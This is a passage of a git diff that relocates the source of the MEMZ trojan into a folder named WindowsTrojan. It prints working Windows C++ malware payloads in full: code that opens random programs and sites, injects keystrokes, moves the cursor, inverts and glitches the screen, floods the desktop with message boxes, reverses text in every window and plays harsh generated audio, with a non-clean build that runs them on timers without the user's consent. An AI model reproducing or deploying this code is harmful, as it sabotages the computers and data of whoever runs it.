(LPVOID)payloadExecute, L"Open random websites/programs", FALSE, 0, 0, 0, 0, 0 }, + { payloadHostDefault, (LPVOID)payloadCursor, L"Random cursor movement", TRUE, 0, 0, 0, 0, 0 }, + { payloadHostDefault, (LPVOID)payloadKeyboard, L"Random keyboard input", FALSE, 0, 0, 0, 0, 0 }, + { payloadHostDefault, (LPVOID)payloadSound, L"Random error sounds", TRUE, 0, 0, 0, 0, 0 }, + { payloadHostVisual, (LPVOID)payloadInvert, L"Invert Screen", TRUE, 0, 0, 0, 0, 0 }, + { payloadHostDefault, (LPVOID)payloadMessageBox, L"Message boxes", TRUE, 0, 0, 0, 0, 0 }, + { payloadHostVisual, (LPVOID)payloadDrawErrors, L"Draw error icons", TRUE, 0, 0, 0, 0, 0 }, + { payloadHostDefault, (LPVOID)payloadReverseText, L"Reverse text", FALSE, 0, 0, 0, 0, 0 }, + { payloadHostVisual, (LPVOID)payloadTunnel, L"Tunnel effect", TRUE, 0, 0, 0, 0, 0 }, + { payloadHostVisual, (LPVOID)payloadGlitches, L"Screen glitches", TRUE, 0, 0, 0, 0, 0 }, + { payloadHostCrazyBus, NULL, L"Crazy Bus (Ear Rape)", TRUE, 0, 0, 0, 0, 0 }, +#else + { payloadHostDefault, (LPVOID)payloadExecute, 30000, 0, 0, 0, 0 }, + { payloadHostDefault, (LPVOID)payloadCursor, 30000, 0, 0, 0, 0 }, + { payloadHostDefault, (LPVOID)payloadKeyboard, 20000, 0, 0, 0, 0 }, + { payloadHostDefault, (LPVOID)payloadSound, 50000, 0, 0, 0, 0 }, + { payloadHostVisual, (LPVOID)payloadInvert, 30000, 0, 0, 0, 0 }, + { payloadHostDefault, (LPVOID)payloadMessageBox, 20000, 0, 0, 0, 0 }, + { payloadHostVisual, (LPVOID)payloadDrawErrors, 10000, 0, 0, 0, 0 }, + { payloadHostDefault, (LPVOID)payloadReverseText, 40000, 0, 0, 0, 0 }, + { payloadHostVisual, (LPVOID)payloadTunnel, 60000, 0, 0, 0, 0 }, + { payloadHostVisual, (LPVOID)payloadGlitches, 15000, 0, 0, 0, 0 }, + { payloadHostCrazyBus, NULL, 1000, 0, 0, 0, 0 }, +#endif +}; + +const size_t nPayloads = sizeof(payloads) / sizeof(PAYLOAD); +BOOLEAN enablePayloads = TRUE; + +PAYLOADHOST(payloadHostDefault) { + PAYLOAD *payload = (PAYLOAD*)parameter; + + for (;;) { +#ifdef CLEAN + if (enablePayloads && SendMessage(payload->btn, BM_GETCHECK, 0, NULL) == BST_CHECKED) { +#endif + if (payload->delaytime++ >= payload->delay) { +#ifdef CLEAN + payload->delay = ((PAYLOADFUNCTIONDEFAULT((*)))payload->payloadFunction)(payload->times++, payload->runtime, FALSE); +#else + payload->delay = ((PAYLOADFUNCTIONDEFAULT((*)))payload->payloadFunction)(payload->times++, payload->runtime); +#endif + + payload->delaytime = 0; + } + + payload->runtime++; +#ifdef CLEAN + } else { + payload->runtime = 0; + payload->times = 0; + payload->delay = 0; + } +#endif + + Sleep(10); + } +} + +PAYLOADHOST(payloadHostVisual) { + PAYLOAD *payload = (PAYLOAD*)parameter; + + HWND hwnd = GetDesktopWindow(); + HDC hdc = GetWindowDC(hwnd); + RECT rekt; + GetWindowRect(hwnd, &rekt); + int w = rekt.right - rekt.left; + int h = rekt.bottom - rekt.top; + + for (;;) { +#ifdef CLEAN + if (enablePayloads && SendMessage(payload->btn, BM_GETCHECK, 0, NULL) == BST_CHECKED) { +#endif + if (payload->delaytime++ >= payload->delay) { +#ifdef CLEAN + payload->delay = ((PAYLOADFUNCTIONVISUAL((*)))payload->payloadFunction)(payload->times++, payload->runtime, FALSE, hwnd, hdc, &rekt, w, h); +#else + payload->delay = ((PAYLOADFUNCTIONVISUAL((*)))payload->payloadFunction)(payload->times++, payload->runtime, hwnd, hdc, &rekt, w, h); +#endif + payload->delaytime = 0; + } + + payload->runtime++; +#ifdef CLEAN + } + else { + payload->runtime = 0; + payload->times = 0; + payload->delay = 0; + } +#endif + + Sleep(10); + } +} + +PAYLOADFUNCTIONDEFAULT(payloadExecute) { + PAYLOADHEAD + + ShellExecuteA(NULL, "open", (LPCSTR)sites[random() % nSites], NULL, NULL, SW_SHOWDEFAULT); + + out: return 1500.0 / (times / 15.0 + 1) + 100 + (random() % 200); +} + +PAYLOADFUNCTIONVISUAL(payloadInvert) { + PAYLOADHEAD + + BitBlt(hdc, 0, 0, w, h, hdc, 0, 0, NOTSRCCOPY); + + out: return 100; +} + +PAYLOADFUNCTIONDEFAULT(payloadCursor) { + PAYLOADHEAD + + POINT cursor; + GetCursorPos(&cursor); + + SetCursorPos(cursor.x + (random() % 3 - 1) * (random() % (runtime / 2200 + 2)), cursor.y + (random() % 3 - 1) * (random() % (runtime / 2200 + 2))); + + out: return 2; +} + +PAYLOADFUNCTIONDEFAULT(payloadMessageBox) { + PAYLOADHEAD + + CreateThread(NULL, 4096, &messageBoxThread, NULL, NULL, NULL); + + out: return 2000.0 / (times / 8.0 + 1) + 20 + (random() % 30); +} + +DWORD WINAPI messageBoxThread(LPVOID parameter) { + HHOOK hook = SetWindowsHookEx(WH_CBT, msgBoxHook, 0, GetCurrentThreadId()); + MessageBoxW(NULL, L"Still using this computer?", L"lol", MB_SYSTEMMODAL | MB_OK | MB_ICONWARNING); + UnhookWindowsHookEx(hook); + + return 0; +} + +LRESULT CALLBACK msgBoxHook(int nCode, WPARAM wParam, LPARAM lParam) { + if (nCode == HCBT_CREATEWND) { + CREATESTRUCT *pcs = ((CBT_CREATEWND *)lParam)->lpcs; + + if ((pcs->style & WS_DLGFRAME) || (pcs->style & WS_POPUP)) { + HWND hwnd = (HWND)wParam; + + int x = random() % (GetSystemMetrics(SM_CXSCREEN) - pcs->cx); + int y = random() % (GetSystemMetrics(SM_CYSCREEN) - pcs->cy); + + pcs->x = x; + pcs->y = y; + } + } + + return CallNextHookEx(0, nCode, wParam, lParam); +} + +PAYLOADFUNCTIONDEFAULT(payloadReverseText) { + PAYLOADHEAD + + EnumChildWindows(GetDesktopWindow(), &EnumChildProc, NULL); + + out: return 50; +} + +BOOL CALLBACK EnumChildProc(HWND hwnd, LPARAM lParam) { + LPWSTR str = (LPWSTR)GlobalAlloc(GMEM_ZEROINIT, sizeof(WCHAR) * 8192); + + if (SendMessageTimeoutW(hwnd, WM_GETTEXT, 8192, (LPARAM)str, SMTO_ABORTIFHUNG, 100, NULL)) { + strReverseW(str); + SendMessageTimeoutW(hwnd, WM_SETTEXT, NULL, (LPARAM)str, SMTO_ABORTIFHUNG, 100, NULL); + } + + GlobalFree(str); + + return TRUE; +} + +PAYLOADFUNCTIONDEFAULT(payloadSound) { + PAYLOADHEAD + + // There seems to be a bug where toggling ALL payloads kills the sound output on some systems. + // I don't know why this happens, but using SND_SYNC seems to fix the bug. + // But the sound is not not as fast as before. I hope there is another way to fix it without slowing down the payload. + // As this only happens for the enable-disable part, I will only include that in the clean build as a workaround. +#ifdef CLEAN + PlaySoundA(sounds[random() % nSounds], GetModuleHandle(NULL), SND_SYNC); + out: return random() % 10; +#else + PlaySoundA(sounds[random() % nSounds], GetModuleHandle(NULL), SND_ASYNC); + out: return 20 + (random() % 20); +#endif +} + +PAYLOADFUNCTIONVISUAL(payloadGlitches) { + PAYLOADHEAD + + int x1 = random() % (w - 400); + int y1 = random() % (h - 400); + int x2 = random() % (w - 400); + int y2 = random() % (h - 400); + int width = random() % 400; + int height = random() % 400; + + BitBlt(hdc, x1, y1, width, height, hdc, x2, y2, SRCCOPY); + + out: return 200.0 / (times / 5.0 + 1) + 3; +} + +PAYLOADFUNCTIONDEFAULT(payloadKeyboard) { + PAYLOADHEAD + + INPUT input; + + input.type = INPUT_KEYBOARD; + input.ki.wVk = (random() % (0x5a - 0x30)) + 0x30; + SendInput(1, &input, sizeof(INPUT)); + + out: return 300 + (random() % 400); +} + +PAYLOADFUNCTIONVISUAL(payloadTunnel) { + PAYLOADHEAD + + StretchBlt(hdc, 50, 50, w - 100, h - 100, hdc, 0, 0, w, h, SRCCOPY); + + out: return 200.0 / (times / 5.0 + 1) + 4; +} + +PAYLOADFUNCTIONVISUAL(payloadDrawErrors) { + PAYLOADHEAD + + int ix = GetSystemMetrics(SM_CXICON) / 2; + int iy = GetSystemMetrics(SM_CYICON) / 2; + + POINT cursor; + GetCursorPos(&cursor); + + DrawIcon(hdc, cursor.x - ix, cursor.y - iy, LoadIcon(NULL, IDI_ERROR)); + + if (random() % (int)(10/(times/500.0+1)+1) == 0) { + DrawIcon(hdc, random()%(w-ix), random()%(h-iy), LoadIcon(NULL, IDI_WARNING)); + } + + out: return 2; +} + +PAYLOADHOST(payloadHostCrazyBus) { + PAYLOAD *payload = (PAYLOAD*)parameter; + + WAVEFORMATEX fmt = { WAVE_FORMAT_PCM, 1, 44100, 44100, 1, 8, 0 }; + + HWAVEOUT hwo; + waveOutOpen(&hwo, WAVE_MAPPER, &fmt, NULL, NULL, CALLBACK_NULL); + + const int bufsize = 44100 * 30; // 30 Seconds + char *wavedata = (char *)LocalAlloc(0, bufsize); + + WAVEHDR hdr = { wavedata, bufsize, 0, 0, 0, 0, 0, 0 }; + waveOutPrepareHeader(hwo, &hdr, sizeof(hdr)); + + for (;;) { +#ifdef CLEAN + if (enablePayloads && SendMessage(payload->btn, BM_GETCHECK, 0, NULL) == BST_CHECKED) { +#endif + int freq = 0; + for (int i = 0; i < bufsize; i++) { + if (i % (44100 / 4) == 0) + freq = 44100 / ((random() % 4000) + 1000); + + wavedata[i] = (char)(((i % freq) / ((float)freq)) * 100); + } + +#ifdef CLEAN + waveOutReset(hwo); +#endif + waveOutWrite(hwo, &hdr, sizeof(hdr)); + + while (!(hdr.dwFlags & WHDR_DONE) +#ifdef CLEAN + && (enablePayloads && SendMessage(payload->btn, BM_GETCHECK, 0, NULL) == BST_CHECKED) +#endif + ) { + Sleep(1); + } + +#ifdef CLEAN + if (!enablePayloads || SendMessage(payload->btn, BM_GETCHECK, 0, NULL) != BST_CHECKED) { + waveOutPause(hwo); + } + } else { + Sleep(10); + } +#endif + } } \ No newline at end of file diff --git a/VCProject/MEMZ/payloads.h b/WindowsTrojan/MEMZ/payloads.h similarity index 96% rename from VCProject/MEMZ/payloads.h rename to WindowsTrojan/MEMZ/payloads.h index 1aebe24..d20057f 100644 --- a/VCProject/MEMZ/payloads.h +++ b/WindowsTrojan/MEMZ/payloads.h @@ -1,33 +1,33 @@ -#pragma once -#include "memz.h" - -#define PAYLOADHOST(name) DWORD (WINAPI name)(LPVOID parameter) - -typedef struct { - PAYLOADHOST(*payloadHost); - void *payloadFunction; - -#ifdef CLEAN - wchar_t *name; - BOOLEAN safe; - - HWND btn; - int delaytime, delay, runtime, times; -#else - int startDelay; - int delaytime, delay, runtime, times; -#endif -} PAYLOAD; - -#ifdef CLEAN -#define PAYLOADFUNCTIONDEFAULT(name) int name (int times, int runtime, BOOLEAN skip) -#define PAYLOADFUNCTIONVISUAL(name) int name (int times, int runtime, BOOLEAN skip, HWND hwnd, HDC hdc, LPRECT rekt, int w, int h) -#define PAYLOADHEAD if (skip) goto out; -#else -#define PAYLOADFUNCTIONDEFAULT(name) int name (int times, int runtime) -#define PAYLOADFUNCTIONVISUAL(name) int name (int times, int runtime, HWND hwnd, HDC hdc, LPRECT rekt, int w, int h) -#define PAYLOADHEAD -#endif - -extern PAYLOAD payloads[]; +#pragma once +#include "memz.h" + +#define PAYLOADHOST(name) DWORD (WINAPI name)(LPVOID parameter) + +typedef struct { + PAYLOADHOST(*payloadHost); + void *payloadFunction; + +#ifdef CLEAN + wchar_t *name; + BOOLEAN safe; + + HWND btn; + int delaytime, delay, runtime, times; +#else + int startDelay; + int delaytime, delay, runtime, times; +#endif +} PAYLOAD; + +#ifdef CLEAN +#define PAYLOADFUNCTIONDEFAULT(name) int name (int times, int runtime, BOOLEAN skip) +#define PAYLOADFUNCTIONVISUAL(name) int name (int times, int runtime, BOOLEAN skip, HWND hwnd, HDC hdc, LPRECT rekt, int w, int h) +#define PAYLOADHEAD if (skip) goto out; +#else +#define PAYLOADFUNCTIONDEFAULT(name) int name (int times, int runtime) +#define PAYLOADFUNCTIONVISUAL(name) int name (int times, int runtime, HWND hwnd, HDC hdc, LPRECT rekt, int w, int h) +#define PAYLOADHEAD +#endif + +extern PAYLOAD payloads[]; extern const size_t nPayloads; \ No newline at end of file diff --git a/VCProject/MEMZ/utils.cpp b/WindowsTrojan/MEMZ/utils.cpp similarity index 94% rename from VCProject/MEMZ/utils.cpp rename to WindowsTrojan/MEMZ/utils.cpp index 2b5bd59..852b83f 100644 --- a/VCProject/MEMZ/utils.cpp +++ b/WindowsTrojan/MEMZ/utils.cpp @@ -1,36 +1,36 @@ -#include "memz.h" - -HCRYPTPROV prov; - -int random() { - if (prov == NULL) - if (!CryptAcquireContext(&prov, NULL, NULL, PROV_RSA_FULL, CRYPT_SILENT | CRYPT_VERIFYCONTEXT)) - ExitProcess(1); - - int out; - CryptGenRandom(prov, sizeof(out), (BYTE *)(&out)); - return out & 0x7fffffff; -} - -void strReverseW(LPWSTR str) { - int len = lstrlenW(str); - - if (len <= 1) - return; - - WCHAR c; - int i, j; - for (i = 0, j = len - 1; i < j; i++, j--) { - c = str[i]; - str[i] = str[j]; - str[j] = c; - } - - // Fix Newlines - for (i = 0; i < len - 1; i++) { - if (str[i] == L'\n' && str[i + 1] == L'\r') { - str[i] = L'\r'; - str[i + 1] = L'\n'; - } - } +#include "memz.h" + +HCRYPTPROV prov; + +int random() { + if (prov == NULL) + if (!CryptAcquireContext(&prov, NULL, NULL, PROV_RSA_FULL, CRYPT_SILENT | CRYPT_VERIFYCONTEXT)) + ExitProcess(1); + + int out; + CryptGenRandom(prov, sizeof(out), (BYTE *)(&out)); + return out & 0x7fffffff; +} + +void strReverseW(LPWSTR str) { + int len = lstrlenW(str); + + if (len <= 1) + return; + + WCHAR c; + int i, j; + for (i = 0, j = len - 1; i < j; i++, j--) { + c = str[i]; + str[i] = str[j]; + str[j] = c; + } + + // Fix Newlines + for (i = 0; i < len - 1; i++) { + if (str[i] == L'\n' && str[i + 1] == L'\r') { + str[i] = L'\r'; + str[i + 1] = L'\n'; + } + } } \ No newline at end of file diff --git a/VCProject/MEMZ/win32_crt_float.cpp b/WindowsTrojan/MEMZ/win32_crt_float.cpp similarity index 100% rename from VCProject/MEMZ/win32_crt_float.cpp rename to WindowsTrojan/MEMZ/win32_crt_float.cpp